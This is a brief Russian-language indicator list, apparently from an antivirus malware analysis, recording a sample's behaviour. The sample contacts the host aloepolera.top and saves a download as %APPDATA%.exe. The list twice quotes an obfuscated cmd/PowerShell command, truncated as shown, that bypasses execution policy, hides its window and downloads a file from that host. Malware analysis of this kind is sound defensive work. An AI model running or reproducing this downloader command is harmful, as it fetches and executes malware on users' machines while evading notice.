Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^wERShe^L^l.eX^E -eX^E^CUtiONPoL^icY^ ^BYp^a^SS ^-^no^p^rOFIlE -wInd^Ow^sT^Yl^e^ ^Hid^dEN^ ^(ne^w-oB^jECT s^Y^sT^e^M^.N^E^t^.^w^EBCLi^ENt)^.DOwnLoA^d^fi^lE('http://aloepolera.to...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "Po^wERShe^L^l.eX^E -eX^E^CUtiONPoL^icY^ ^BYp^a^SS ^-^no^p^rOFIlE -wInd^Ow^sT^Yl^e^ ^Hid^dEN^ ^(ne^w-oB^jECT s^Y^sT^e^M^.N^E^t^.^w^EBCLi^ENt)^.DOwnLoA^d^fi^lE('http://aloepolera.to...' (со скрытым окном)